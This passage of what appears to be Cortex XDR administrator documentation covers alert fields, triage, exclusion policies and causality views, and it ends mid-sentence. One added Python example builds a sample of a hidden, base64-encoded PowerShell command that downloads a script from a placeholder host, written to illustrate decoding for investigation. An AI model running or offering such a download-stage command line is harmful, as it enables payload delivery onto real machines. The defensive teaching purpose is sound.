Alerts that contain a Featured Alert Field are displayed with a flag.

ALERT SOURCE Source of the alert: BIOC, Analytics BIOC, IOC, XDR
Agent, Firewall, or Analytics.

APP-ID Related App-ID for an alert. App-ID is a traffic classification system that determines what an application is irrespective of port, protocol, encryption (SSH or SSL) or any other evasive tactic used by the application. When known, you can also pivot to the Palo Alto Networks Applipedia entry that describes the detected application.

APP CATEGORY APP-ID category name associated with a firewall alert.

APP SUBCATEGORY APP-ID subcategory name associated with a firewall alert.

APP TECHNOLOGY APP-ID technology name associated with a firewall alert.

CATEGORY Alert category based on the alert source. An example of an XDR Agent alert category is Exploit Modules. An example of a BIOC alert category is Evasion. If a URL filtering category is known, this field also displays the name of the URL filtering category.

CGO CMD Command-line arguments of the Causality Group Owner (CGO).


CGO MD5 The MD5 value of the CGO that initiated the alert.

CGO NAME The name of the process that started the causality
chain based on Cortex XDR causality logic.

CGO SHA256 The SHA256 value of the CGO that initiated the alert.

CGO SIGNATURE Signing status of the CGO:
• Unsigned
• Signed
• Invalid Signature
• Unknown

CGO SIGNER The name of the software publishing vendor that signed the file in the causality chain that led up to the alert.

CONTAINS FEATURED HOST Displays whether the alert includes a host name that
has been flagged as a Featured Alert Field.

CONTAINS FEATURED USER Displays whether the alert includes a user name that
has been flagged as a Featured Alert Field.

CONTAINS FEATURED IP ADDRESS Displays whether the alert includes an IP address that has been flagged as a Featured Alert Field.

CID Unique identifier of the causality instance generated by Cortex XDR.

DESCRIPTION Text summary of the event including the alert source, alert name, severity, and file path. For alerts triggered by BIOC and IOC rules, Cortex XDR displays detailed information about the rule.

DESTINATION ZONE NAME The destination zone of the connection for firewall
alerts.

DNS Query Name The domain name queried in the DNS request.

DOMAIN The domain on which an alert was triggered.

EMAIL RECIPIENT The email recipient value of a firewall alert triggered on the content of a malicious email.

EMAIL SENDER The email sender value of a firewall alert triggered on the content of a malicious email.

EMAIL SUBJECT The email subject value of a firewall alert triggered on the content of a malicious email.

EVENT TYPE The type of event on which the alert was triggered:

• File Event
• Injection Event
• Load Image Event
• Network Event
• Process Execution
• Registry Event

EXCLUDED Whether the alert is excluded by an exclusion configuration.

EXTERNAL ID The alert ID as recorded in the detector from which this alert was sent.

FILE PATH When the alert triggered on a file (the Event Type is
File) this is the path to the file on the endpoint. If not,
then N/A.

FILE MACRO SHA256 SHA256 hash value of a Microsoft Office file macro.

FILE MD5 MD5 hash value of the file.

FILE SHA256 SHA256 hash value of the file.

FW NAME Name of firewall on which a firewall alert was raised.

FW RULE ID The firewall rule ID that triggered the firewall alert.

FW RULE NAME The firewall rule name that matches the network
traffic that triggered the firewall alert.

FW SERIAL NUMBER The serial number of the firewall that raised the
firewall alert.

HOST The hostname of the endpoint or server on which this alert triggered. The hostname is generally available for XDR agent alerts or alerts that are stitched with EDR data. When the hostname is unknown, this field is blank.

HOST FQDN The fully qualified domain name (FQDN) of the Windows endpoint or server on which this alert triggered.

HOST IP IP address of the endpoint or server on which this alert triggered.

HOST MAC ADDRESS MAC address of the endpoint or server on which this
alert triggered.

HOST OS Operating system of the endpoint or server on which this alert triggered.


INCIDENT ID The ID of any incident that includes the alert.

INITIATED BY The name of the process that initiated an activity such as a network connection or registry change.

INITIATOR MD5 The MD5 value of the process which initiated the
alert.

INITIATOR SHA256 The SHA256 hash value of the initiator.

INITIATOR CMD Command-line used to initiate the process, including any arguments.

INITIATOR SIGNATURE Signing status of the process that initiated the activity:
• Unsigned
• Signed
• Invalid Signature
• Unknown

INITIATOR PATH Path of the initiating process.

INITIATOR PID Process ID (PID) of the initiating process.

INITIATOR SIGNER Signer of the process that triggered the alert.

INITIATOR TID Thread ID (TID) of the initiating process.

IS PHISHING Indicates whether a firewall alert is classified as phishing.

LOCAL IP If the alert triggered on network activity (the Event Type is Network Connection) this is the IP address of the host that triggered the alert. If not, then N/A.

LOCAL PORT If the alert triggered on network activity (the Event Type is Network Connection) this is the port on the endpoint that triggered the alert. If not, then N/A.

MAC ADDRESS The MAC address on which the alert was triggered.

MISC Miscellaneous information about the alert.

MITRE ATT&CK TACTIC Displays the type of MITRE ATT&CK tactic on which
the alert was triggered.

MITRE ATT&CK TECHNIQUE Displays the type of MITRE ATT&CK technique and
sub-technique on which the alert was triggered.

MODULE For XDR Agent alerts, this field identifies the protection module that triggered the alert.


NGFW VSYS NAME Name of the virtual system for the Palo Alto
Networks firewall that triggered an alert.

OS PARENT CREATED BY Name of the OS parent process, that is, the parent process as recorded by the operating system (as distinct from the causality parent), of the process that triggered the alert.

OS PARENT CMD Command-line used by the OS parent process to initiate the process, including any arguments.

OS PARENT SIGNATURE Signing status of the OS parent process:
• Unsigned
• Signed
• Invalid Signature
• Unknown

OS PARENT SIGNER Signer of the OS parent process.

OS PARENT SHA256 SHA256 hash value of the OS parent process.

OS PARENT ID Identifier of the OS parent process.

OS PARENT PID Process ID (PID) of the OS parent process.

OS PARENT TID Thread ID (TID) of the OS parent process.

OS PARENT USER NAME Name of the user associated with the OS parent process.

PROCESS EXECUTION SIGNATURE Signature status of the process that triggered the
alert:
• Unsigned
• Signed
• Invalid Signature
• Unknown

PROCESS EXECUTION SIGNER Signer of the process that triggered the alert.

REGISTRY DATA If the alert triggered on registry modifications (the Event Type is Registry) this is the registry data that triggered the alert. If not, then N/A.

REGISTRY FULL KEY If the alert triggered on registry modifications (the Event Type is Registry) this is the full registry key that triggered the alert. If not, then N/A.

REMOTE HOST If the alert triggered on network activity (the Event Type is Network Connection) this is the remote host name that triggered the alert. If not, then N/A.


REMOTE IP The remote IP address of a network operation that triggered the alert.

REMOTE PORT The remote port of a network operation that triggered the alert.

RULE ID The ID that matches the rule that triggered the alert.

SEVERITY The severity that was assigned to this alert when it was triggered (or modified): Informational, Low, Medium, High, or Unknown. For BIOC and IOC rules, you define the severity when you create the rule. Insights are low and informational severity alerts that do not raise incidents, but provide additional details when investigating an event.

STARRED Whether the alert is starred by starring configuration.

SOURCE ZONE NAME The source zone name of the connection for firewall
alerts.

TARGET FILE SHA256 The SHA256 hash value of an external DLL file that triggered the alert.

TARGET PROCESS CMD The command-line of the process whose creation triggered the alert.

TARGET PROCESS NAME The name of the process whose creation triggered the
alert.

TARGET PROCESS SHA256 The SHA256 value of the process whose creation
triggered the alert.

TIMESTAMP The date and time when the alert was triggered.
Right-click to Show rows 30 days prior or 30 days
after the selected timestamp field value.

URL The URL destination address of the domain triggering the firewall alert.

USER NAME The name of the user that initiated the behavior
that triggered the alert. If the user is a domain user
account, this field also identifies the domain.

XFF The X-Forwarded-For value from the HTTP header, which identifies the client IP address of a connection that passed through a proxy.

From the Alerts page, you can also perform additional actions to manage alerts and pivot on specific alerts
for deeper understanding of the cause of the event.
• Manage Alerts

• Causality View
• Timeline View
• Analytics Alert View

Triage Alerts
When the Cortex XDR app displays a new alert on the Alerts page, use the following steps to investigate
and triage the alert:

STEP 1 | Review the data shown in the alert such as the command-line arguments (CMD), process info,
etc.
For more information about the alert fields, see Cortex XDR Alerts.

STEP 2 | Analyze the chain of execution in the Causality View.
When the app correlates an alert with additional endpoint data, the Alerts table displays a green dot to the left of the alert row to indicate the alert is eligible for analysis in the Causality View. If the alert has a gray dot, the alert is not eligible for analysis in the Causality View. This can occur when there is no data collected for an event, or the app has not yet finished processing the EDR data. To view the reason analysis is not available, hover over the gray dot.

STEP 3 | Review the Timeline View to review the sequence of events over time.
The timeline is available for alerts that have been stitched with endpoint data.

STEP 4 | If deemed malicious, consider responding by isolating the endpoint from the network.

STEP 5 | Remediate the endpoint and return the endpoint from isolation.

STEP 6 | Inspect the information again to identify any behavioral details that you can use to Create a
BIOC Rule.
If you can create a BIOC rule, test and tune the logic for the rule, and then save it.

Manage Alerts
From the Alerts page, you can manage the alerts you see and the information Cortex XDR displays about
each alert.

• Copy Alerts
• Analyze an Alert
• Create Profile Exceptions

• Create a Featured Alert Field
• View Generating BIOC or IOC Rule
• Retrieve Additional Alert Details
• Add an Alert Exclusion Policy
• Forward Alerts to an External Service

Copy Alerts
You can copy an alert to the clipboard in any of the following ways:
• Copy the URL of the alert record
• Copy the value of an alert field
• Copy the entire row of the alert record
With any of these options, you can paste the clipboard contents into an email to send. This is helpful if you need to share or discuss a specific alert with someone. If you copy a field value, you can also easily paste it into a search or begin a query.

• Create a URL for an alert record:
1. From the Alerts page, right-click the alert you want to send.
2. Select Copy alert URL.
Cortex XDR saves the URL to the clipboard.
3. Paste the URL into an email or use it as needed to share the alert.

• Copy a field value in an alert record:
1. From the Alerts page, right-click the field in the alert that you want to copy.
2. Select Copy text to clipboard.
Cortex XDR saves the field contents to the clipboard.
3. Paste the value into an email or use it as needed to share information from the alert.

• Copy the entire row of an alert record:
1. From the Alerts page, right-click one or more alerts you want to copy.
2. Select Copy entire row(s).
3. Paste the value into an email or use it as needed to share information from the alert.

Analyze an Alert
To help you understand the full context of an alert, Cortex XDR provides a powerful analysis view that
empowers you to make a thorough analysis very quickly.
The Causality View is available for XDR agent alerts that are based on endpoint data and for alerts raised on
network traffic logs that have been stitched with endpoint data.
To view the analysis:

STEP 1 | From the Alerts page, locate the alert you want to analyze.

STEP 2 | Right-click anywhere in the alert, and select Investigate Causality Chain.

STEP 3 | Choose whether to open the Causality View card for an alert in a new tab or the same tab.
You can also view the causality chain over time using the Timeline view.

STEP 4 | Review the chain of execution and available data for the process and, if available, navigate
through the processes tree.

Create Profile Exceptions
For XDR Agent alerts, you can create profile exceptions for Windows processes, BTP (Behavioral Threat Protection), and Java deserialization alerts directly from the Alerts table.

STEP 1 | Right-click an XDR Agent alert that has a category of Exploit and select Create alert exception.

STEP 2 | Select an Exception Scope:
• Global—Apply the exception across your organization.
• Profile—Apply the exception to an existing profile, or enter a Profile Name to create a new profile.

STEP 3 | Add the scope.

STEP 4 | (Optional) View your profile exceptions.
1. Navigate to Endpoints > Policy Management > Profiles.
2. In the Profiles table, locate the OS for which you created your global or profile exception and right-click to view or edit the exception properties.

Create a Featured Alert Field
To better highlight alerts that are significant to you, Cortex XDR enables you to label specific alert attributes as Featured Alert Fields. Featured alert fields help you track, in the Alerts Table, alerts that involve specific host names, user names, and IP addresses.

STEP 1 | Navigate to Investigation > Incident Management > Featured Fields and select a type of
featured field:
• Hosts
• Users
• IP Addresses
• Active Directory

STEP 2 | In the field type table, Add a featured field name to define a list of alert field values you want flagged in the Alerts Table. You can either Create New featured alert fields from scratch or Upload from File.
• To create a new alert field:
1. Enter one or more field values and Add them to the list.
2. (Optional) Add a comment.
3. Add the featured alert field.
• To import fields:
1. Browse or drag and drop your CSV file of field values. Download the example file to ensure you are using the correct format.
2. Import your file.

STEP 3 | (Optional) Manage your featured alert field list.
• Locate the alert field you want to edit or delete.

• Right-click and Edit Field Name to modify the field definition, or Delete Field Name to remove the
featured flag.

STEP 4 | Investigate alerts that contain the featured alert fields.
• Navigate to the Alerts Table.
• In the Alerts table, sort according to the following fields:
• Contains Featured Host
• Contains Featured User
• Contains Featured IP Address
• In the Alert Name field, Cortex XDR displays alerts that contain a matching featured field value with a flag.

Featured Active Directory values are displayed in the User and Host fields accordingly.

• (Optional) Create an incident scoring rule using the Contains Featured Host, Contains Featured User, and Contains Featured IP Address fields of the Alerts table to further highlight and prioritize alerts containing the featured host, user, and IP address attributes.

View Generating BIOC or IOC Rule
Easily view the BIOC or IOC rule that generated an alert directly from the Alerts table.

STEP 1 | From the Alerts page, locate alerts with Alert Source XDR BIOC or XDR IOC.

STEP 2 | Right-click the row, and select View generating rule.
Cortex XDR opens the rule that generated the alert in the corresponding rules page (BIOC Rules or IOC Rules). If the rule has been deleted, an empty table is displayed.

STEP 3 | Review the rule and, if necessary, right-click to perform available actions.

Retrieve Additional Alert Details
To easily access additional information relating to an alert:

STEP 1 | From the Alerts page, locate the alert for which you want to retrieve information.

STEP 2 | Right-click anywhere in the alert, and select one of the following options:
• Retrieve alert data—Cortex XDR can provide additional analysis of the memory contents when an
exploit protection module raises an XDR Alert. To perform the analysis you must first retrieve alert
data consisting of the memory contents at the time the alert was raised. This can be done manually
for a specific alert, or you can enable Cortex XDR to automatically retrieve alert data for every
relevant XDR Alert. After Cortex XDR receives the data and performs the analysis, it issues a verdict
for the alert. You can monitor the retrieval and analysis progress from the Action Center (pivot to
view Additional data). When analysis is complete, Cortex XDR displays the verdict in the Advanced
Analysis field.
• Retrieve related files—To further examine files that are involved in an alert, you can request the
Cortex XDR agent send them to the Cortex XDR management console. If multiple files are involved,
Cortex XDR supports up to 20 files and 200MB in total size. The agent collects all requested files into
one archive and includes a log in JSON format containing additional status information. When the
files are successfully uploaded, you can download them from the Action Center for up to one week.
• View full endpoint details—Jump to a filtered view of the Endpoint Administration page by endpoint
ID. This unique ID is assigned by the Cortex XDR agent to identify the endpoint.

• For PAN NGFW source type alerts, Download triggering packet—Download the session PCAP
containing the first 100 bytes of the triggering packet directly from Cortex XDR. To access the PCAP,
you can download the file from the Alerts table, Incident, or Causality view.

STEP 3 | Navigate to Response > Action Center to view retrieval status.

Alert Exclusions
The Investigation > Incident Management > Exclusions page displays all alert exclusion policies in Cortex
XDR.

An alert exclusion is a policy that contains a set of alert match criteria that you want to suppress from
Cortex XDR. You can Add an Alert Exclusion Policy from scratch or you can base the exclusion off of alerts
that you investigate in an incident. After you create an exclusion policy, Cortex XDR hides any future alerts
that match the criteria from incidents and search query results. If you choose to apply the policy to historic
results as well as future alerts, the app identifies any historic alerts as grayed out.
The following table describes both the default fields and additional optional fields that you can add to the
alert exclusions table and lists the fields in alphabetical order.

Field Description

Check box to select one or more alert exclusions on which you want to
perform actions.

BACKWARD SCAN STATUS Exclusion policy status for historic data: enabled if you want to apply the policy to previous alerts, or disabled if you do not.

COMMENT Administrator-provided comment that identifies the purpose or reason for the
exclusion policy.

DESCRIPTION Text summary of the policy that displays the match criteria.

MODIFICATION DATE Date and time when the exclusion policy was created or modified.

NAME Descriptive name provided to identify the exclusion policy.

POLICY ID Unique ID assigned to the exclusion policy.

STATUS Exclusion policy status, either enabled or disabled.

USER User that last modified the exclusion policy.

USER EMAIL Email associated with the administrative user.

Add an Alert Exclusion Policy
Through the process of triaging alerts or resolving an incident, you may determine a specific alert does
not indicate a threat. If you do not want Cortex XDR to display alerts that match certain criteria, you can
create an alert exclusion policy. After you create an exclusion policy, Cortex XDR hides any future alerts
that match the criteria, and excludes the alerts from incidents and search query results. If you choose to
apply the policy to historic results as well as future alerts, the app identifies any historic alerts as grayed out.

If an incident contains only alerts with exclusions, Cortex XDR changes the incident status to
Resolved - False Positive and sends an email notification to the incident assignee (if set).

There are two ways to create an exclusion policy. You can define the exclusion criteria when you
investigate an incident or you can create an alert exclusion from scratch.
• Build an Alert Exclusion Policy from Alerts in an Incident
• Build an Alert Exclusion Policy from Scratch
Build an Alert Exclusion Policy from Alerts in an Incident
If, after reviewing the incident details, you want to suppress one or more alerts from appearing in the
future, create an exclusion policy based on the alerts in the incident. When you create an exclusion from the
incident view, you can define the criteria based on the alerts in the incident. You can also build an alert
exclusion policy from scratch.

STEP 1 | From the Incident view in Cortex XDR, select Actions > Create Exclusion.

STEP 2 | Enter a POLICY NAME to identify your alert exclusion.

STEP 3 | Enter a descriptive COMMENT that identifies the reason or purpose of the alert exclusion
policy.

STEP 4 | Use the alert filters to add the match criteria for the alert exclusion policy.
You can also right-click a specific value in the alert to add it as match criteria. The app refreshes to show
you which alerts in the incident would be excluded. To see all matching alerts, including those not related
to the incident, clear the option to Show only alerts in the named incident.

STEP 5 | Create the exclusion policy and confirm the action.


If you later need to make changes, you can view, modify, or delete the exclusion policy from the
Investigation > Incident Management > Exclusions page.

Build an Alert Exclusion Policy from Scratch

STEP 1 | Select Investigation > Incident Management > Exclusions.

STEP 2 | Select + Add Exclusion.

STEP 3 | Enter a Policy Name to identify the exclusion policy.

STEP 4 | Enter any comments to explain the purpose or intent behind the policy.

STEP 5 | Define the exclusion criteria.
Use the filters at the top to build your exclusion criteria, or, to populate the criteria from existing alert
values, right-click the value and select Add rows with <value> to policy. As you define the criteria, the app
filters the results to display matches.

STEP 6 | Review the results.
The alerts in the table will be excluded from appearing in the app after the policy is created and,
optionally, any existing alert matches will be grayed out.

This action is irreversible: all historic excluded alerts remain excluded even if you later disable or
delete the policy.

STEP 7 | Create and then select Yes to confirm the alert exclusion policy.
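The exclusion semantics described in this section (hiding future matches, optionally graying out historic
alerts with a backward scan, auto-resolving an incident whose alerts are all excluded, and the one-way
nature of a historic exclusion) as an added Python model. This is illustrative code written for this page,
not code from the guide or from the Cortex XDR product: the dataclasses, the criteria dictionary of
exact-match field values, and the alert names, host names and assignee are constructed assumptions, and the
real console matches on whatever alert filters you select.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple


@dataclass
class Alert:
    alert_id: int
    name: str
    host: str
    excluded: bool = False          # True: hidden from views / grayed out


@dataclass
class Incident:
    incident_id: int
    alerts: List[Alert] = field(default_factory=list)
    assignee: Optional[str] = None
    status: str = "New"


@dataclass
class ExclusionPolicy:
    policy_id: int
    name: str
    criteria: Dict[str, str]        # assumption: every field/value pair must match exactly
    backward_scan: bool             # also gray out matching historic alerts
    enabled: bool = True


def matches(policy: ExclusionPolicy, alert: Alert) -> bool:
    return all(getattr(alert, key, None) == value for key, value in policy.criteria.items())


def resolve_if_all_excluded(incident: Incident, notifications: List[Tuple[str, int]]) -> None:
    """An incident whose alerts are all excluded becomes Resolved - False Positive;
    the assignee, if one is set, receives a notification (recorded here as a tuple)."""
    if incident.alerts and all(a.excluded for a in incident.alerts):
        if incident.status != "Resolved - False Positive":
            incident.status = "Resolved - False Positive"
            if incident.assignee:
                notifications.append((incident.assignee, incident.incident_id))


def create_policy(policy: ExclusionPolicy, incidents: List[Incident],
                  notifications: List[Tuple[str, int]]) -> int:
    """Create a policy. With backward scan enabled, matching historic alerts are
    grayed out immediately; returns how many historic alerts were excluded."""
    grayed = 0
    if policy.backward_scan:
        for incident in incidents:
            for alert in incident.alerts:
                if not alert.excluded and matches(policy, alert):
                    alert.excluded = True
                    grayed += 1
            resolve_if_all_excluded(incident, notifications)
    return grayed


def ingest_alert(alert: Alert, incident: Incident, policies: List[ExclusionPolicy],
                 notifications: List[Tuple[str, int]]) -> bool:
    """A new alert is hidden when any enabled policy matches it.
    Returns True if the alert is shown to the analyst."""
    alert.excluded = any(p.enabled and matches(p, alert) for p in policies)
    incident.alerts.append(alert)
    resolve_if_all_excluded(incident, notifications)
    return not alert.excluded


def disable_policy(policy: ExclusionPolicy) -> None:
    """Disabling (or deleting) a policy stops it from matching new alerts, but the
    historic alerts it already excluded stay excluded; that is the irreversible part."""
    policy.enabled = False


def visible_alerts(incident: Incident) -> List[int]:
    """IDs of the alerts that still appear in incident and search views."""
    return [a.alert_id for a in incident.alerts if not a.excluded]
```

The point to take from the model is the last two functions together: disabling the policy changes only what
happens to alerts that arrive afterwards, so check the backward-scan setting before you create a policy that
matches broadly.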

Causality View
The Causality View provides a powerful way to analyze and respond to alerts. The scope of the Causality
View is the Causality Instance (CI) to which this alert pertains. The Causality View presents the alert
(generated by Cortex XDR or sent to Cortex XDR from a supported alert source such as the Cortex XDR
agent) and includes the entire process execution chain that led up to the alert. On each node in the CI chain,
Cortex XDR provides information to help you understand what happened around the alert.

The Causality View comprises five sections:

Context
Summarizes information about the alert you are analyzing, including the host name, the process name on
which the alert was raised, and the host IP and MAC address. For alerts raised on endpoint data or activity,
this section also displays the endpoint connectivity status and operating system.

Causality Instance Chain
Includes the graphical representation of the Causality Instance (CI) along with other information and
capabilities to enable you to conduct your analysis.
The Causality View presents a single CI chain. The CI chain is built from process nodes, events, and alerts.
The chain presents the process execution and might also include events that these processes caused and
alerts that were triggered on the events or processes. The Causality Group Owner (CGO) is displayed on
the left side of the chain. The CGO is the process that is responsible for all the other processes, events, and
alerts in the chain. You need the entire CI to fully understand why the alert occurred.
The Causality View provides an interactive way to view the CI chain for an alert. You can move it, extend it,
and modify it. To adjust the appearance of the CI chain, you can enlarge or shrink the chain for easy viewing
using the size controls on the right. You can also move the chain around by selecting and dragging it. To
return the chain to its original position and size, use the reset control in the lower-right of the CI graph.
The process node displays icons to indicate when an RPC protocol or code injection event was executed
on another process from either a local or remote host. The icons are labeled Injected Node and Remote IP
address.

Hover over a process node to display a Process Information pop-up listing useful information about the
process. If available, the pop-up includes the process Analytics Profiles.
• Path of the process.
• Command line of the process.
• SHA256 value of the process.
• Username of the user that initiated the process.
• Signature associated with the process, if available.
• WildFire verdict, if available.
• Running time of the process.
From any process node, you can also right-click to display additional actions that you can perform during
your investigation:
• Show parents and children—If the parent is not presented by default, you can display it. If the process
  has children, Cortex XDR displays the number of children beneath the process name and allows you to
  display them for additional information.
• Hide branch—Hide a branch from the Causality View.
• Add to block list or allow list, terminate, or quarantine a process—If, after investigating the activity in
  the CI chain, you want to take action on the process, you can select the desired action to allow or block
  the process across your organization. In the causality view of a Detection (Post Detected) type alert,
  you can also Terminate process by hash.
• Depending on the type of node (file, process, or IP address), open the artifact view:
  • Open Hash View to display detailed information about the files and processes relating to the hash.
  • Open IP View to display detailed information about the IP address.
• Initiate a remediation analysis.

Entity Data
Provides additional information about the entity that you selected. The data varies by the type of entity
but typically identifies information about the entity related to the cause of the alert and the circumstances
under which the alert occurred.
For example, device type, device information, remote IP address.

When you investigate command-line arguments, click {***} to toggle between the obfuscated and decoded
form of a base64-encoded string.
For continued investigation, you can copy the entire entity data summary to the clipboard.
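An added example, written for this page rather than taken from the guide or from Cortex XDR, of the two
operations described in the Causality Instance Chain and Entity Data sections: walking recorded
process-start events from the alerted process up to its Causality Group Owner (and counting the CGO's
children, as the node does), and decoding a base64, UTF-16LE PowerShell -EncodedCommand argument the way
the {***} control decodes it. The events, PIDs, hashes, user and the example.invalid URL are constructed;
treating the CGO as the topmost process present in the collected events is this example's simplification
of how the product chooses it.

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class ProcessEvent:
    """One process-start event as an agent might report it (constructed)."""
    pid: int
    ppid: int
    name: str
    cmdline: str
    sha256: str
    user: str


def index_by_pid(events: List[ProcessEvent]) -> Dict[int, ProcessEvent]:
    return {e.pid: e for e in events}


def children_of(events: List[ProcessEvent]) -> Dict[int, List[int]]:
    kids: Dict[int, List[int]] = {}
    for e in events:
        kids.setdefault(e.ppid, []).append(e.pid)
    return kids


def causality_chain(alert_pid: int, procs: Dict[int, ProcessEvent]) -> List[ProcessEvent]:
    """Walk from the alerted process up through its parents. Assumption: the CGO is
    the first ancestor whose parent was not recorded. Returned CGO first, as the
    Causality View draws the chain left to right. The seen set guards against
    PID reuse producing a cycle."""
    chain: List[ProcessEvent] = []
    seen = set()
    pid = alert_pid
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid])
        pid = procs[pid].ppid
    return list(reversed(chain))


_ENC_FLAG = re.compile(r"(?i)^-(?:e|ec|enc|encodedcommand)$")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode a PowerShell -EncodedCommand value (base64 of UTF-16LE text).
    Returns None when there is no such flag or the payload is not valid base64."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if _ENC_FLAG.match(tok):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def encode_powershell(script: str) -> str:
    """Inverse of the decoder, used only to build the constructed sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: wscript.exe launches cmd.exe and notepad.exe; cmd.exe launches
# an encoded PowerShell command, on which the alert is raised.
SCRIPT = "Invoke-WebRequest -Uri http://example.invalid/a.ps1 -OutFile a.ps1"
SAMPLE_EVENTS = [
    ProcessEvent(1200, 40, "wscript.exe", "wscript.exe invoice.js", "aa" * 32, "corp\\jdoe"),
    ProcessEvent(1310, 1200, "cmd.exe", "cmd.exe /c start", "bb" * 32, "corp\\jdoe"),
    ProcessEvent(1311, 1200, "notepad.exe", "notepad.exe", "cc" * 32, "corp\\jdoe"),
    ProcessEvent(1420, 1310, "powershell.exe",
                 "powershell.exe -nop -w hidden -enc " + encode_powershell(SCRIPT),
                 "dd" * 32, "corp\\jdoe"),
]
ALERT_PID = 1420


def summarize(events: List[ProcessEvent] = SAMPLE_EVENTS, alert_pid: int = ALERT_PID) -> dict:
    """What the CI chain and Entity Data card would show for the alerted process."""
    procs = index_by_pid(events)
    kids = children_of(events)
    chain = causality_chain(alert_pid, procs)
    return {
        "cgo": chain[0].name,
        "chain": [p.name for p in chain],
        "cgo_children": len(kids.get(chain[0].pid, [])),
        "decoded": decode_encoded_command(procs[alert_pid].cmdline),
    }
```

Run summarize() against your own exported process events (the Events Table exports to TSV) to reproduce
the chain offline; the decoder is deliberately strict (validate=True) so a truncated or padded payload is
reported as undecodable rather than silently producing garbage.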

Response Actions
You can choose to isolate the host, on which the alert was triggered, from the network or initiate a live
terminal session to the host to continue investigation and remediation.

Events Table
Displays up to 100,000 events related to the process node on which the alert matched; these events did not
trigger alerts but are informational.
You can also export the table results to a tab-separated values (TSV) file. Right-click to Show rows 30 days
prior or 30 days after the selected timestamp field value.
For the Behavioral Threat Protection table, right-click to add to allow list or block list, terminate, and
quarantine a process.

To view statistics for files on VirusTotal, you can pivot from the Initiator MD5 or SHA256 value of the file
on the Files tab.

Network Causality View
The Network Causality View provides a powerful way to analyze and respond to stitched firewall and
endpoint alerts. The scope of the Causality View is the Causality Instance (CI) to which this alert pertains.
The Causality View presents the network processes that triggered the alert, generated by Cortex XDR, Palo
Alto Networks next-generation firewalls, and supported alert sources such as the Cortex XDR agent.
The Network Causality View includes the entire process execution chain that led up to the alert. On each
node in the CI chain, Cortex XDR provides information to help you understand what happened around the
alert.
The CI chain visualizes the firewall logs, endpoint files, and network connections that triggered alerts
connected to a security event.

The network causality view displays only the information it collects from the detectors. It is
possible that the CI may not show some of the firewall or agent processes.

The Network Causality View comprises five sections:

Section          Description

Context          Summarizes information about the alert you are analyzing, including the
                 host name, the process name on which the alert was raised, and the host IP
                 address. For alerts raised on endpoint data or activity, this section also
                 displays the endpoint connectivity status and operating system.

Host Isolation   You can choose to isolate the host on which the alert was triggered from
                 the network, or initiate a live terminal session to the host to continue
                 investigation and remediation.

CI Chain         Includes the graphical representation of the Causality Instance (CI) along
                 with other information and capabilities to enable you to conduct your
                 analysis.
                 The Causality View presents a CI chain for each of the processes and the
                 network connection. The CI chain is built from process nodes, events, and
                 alerts. The chain presents the process execution and might also include
                 events that these processes caused and alerts that were triggered on the
                 events or processes. The Causality Group Owner (CGO) is displayed on the
                 left side of the chain. The CGO is the process that is responsible for all
                 the other processes, events, and alerts in the chain. You need the entire
                 CI to fully understand why the alert occurred.
                 The Causality View provides an interactive way to view the CI chain for an
                 alert. You can move it, extend it, and modify it. To adjust the appearance
                 of the CI chain, you can enlarge or shrink the chain for easy viewing using
                 the size controls on the right. You can also move the chain around by
                 selecting and dragging it. To return the chain to its original position
                 and size, use the reset control in the lower-right of the CI graph.
                 From any process node, you can also right-click to display additional
                 actions that you can perform during your investigation:
                 • Show parents and children—If the parent is not presented by default,
                   you can display it. If the process has children, Cortex XDR displays
                   the number of children beneath the process name and allows you to
                   display them for additional information.
                 • Hide branch—Hide a branch from the Causality View.
                 • Add to block list or allow list, terminate, or quarantine a process—If,
                   after investigating the activity in the CI chain, you want to take
                   action on the process, you can select the desired action on the process
                   across your organization. In the causality view of a Detection (Post
                   Detected) type alert, you can also Terminate process by hash.
                 When you select the Network Appliance node in the Network Causality View,
                 the event timestamp is displayed in the Entity Data section of the card.
                 The color of a process node also corresponds to its WildFire verdict:
                 • Blue—Benign.
                 • Yellow—Grayware.
                 • Red—Malware.
                 • Light gray—Unknown verdict.
                 • Dark gray—The verdict is inconclusive.
                 To view and download the WildFire report, click the report icon in the
                 Entity Data section.

Entity Data      Provides additional information about the entity that you selected. The
                 data varies by the type of entity but typically identifies information
                 about the entity related to the cause of the alert and the circumstances
                 under which the alert occurred.

Events Table     Displays all events related to the process node on which the alert
                 matched; these events did not trigger alerts but are informational. You
                 can also export the table results to a tab-separated values (TSV) file.
                 For the Behavioral Threat Protection table, right-click to add to allow
                 list or block list, terminate, and quarantine a process.

                 To view statistics for files on VirusTotal, you can pivot from the
                 Initiator MD5 or SHA256 value of the file on the Files tab.

Timeline View
The Timeline provides a forensic timeline of the sequence of events, alerts, and informational BIOCs
involved in an attack. While the Causality View of an alert surfaces related events and processes that
Cortex XDR identifies as important or interesting, the Timeline displays all related events, alerts, and
informational BIOCs over time.

Cortex XDR presents the Timeline in four parts:

Section                      Description

CGO (and process instances   Cortex XDR displays the Causality Group Owner (CGO) and the host on
that are part of the CGO)    which the CGO ran in the top left of the timeline. The CGO is the
                             parent process in the execution chain that Cortex XDR identified as
                             being responsible for initiating the process tree. In the example
                             above, wscript.exe is the CGO and the host it ran on was HOST488497.
                             You can also click the blue corner of the CGO to view and filter
                             related processes from the Timeline. This adds or removes the
                             process, and the events or alerts associated with it, from the
                             Timeline.

Timespan                     By default, Cortex XDR displays a 24-hour period from the start of
                             the investigation and displays the start and end time of the CGO at
                             either end of the timescale. You can move the slide bar to the left
                             or right to focus on any time gap within the timescale. You can also
                             use the time filters above the table to focus on set time periods.

Activity                     Depending on the type of activities involved in the CI chain of
                             events, the activity section can present any of the following three
                             lanes across the page:
                             • Alerts—The alert icon indicates when the alert occurred.
                             • BIOCs—The category of the alert is displayed on the left (for
                               example, tampering or lateral movement). Each BIOC event also
                               carries a color associated with the alert severity. An
                               informational severity indicates that something interesting
                               happened but no alert was triggered. These events are likely
                               benign but are byproducts of the actual issue.
                             • Event information—The event types include process execution,
                               outgoing or incoming connections, failed connections, data upload,
                               and data download. Process execution and connections are
                               indicated by a dot. One dot indicates one connection, while many
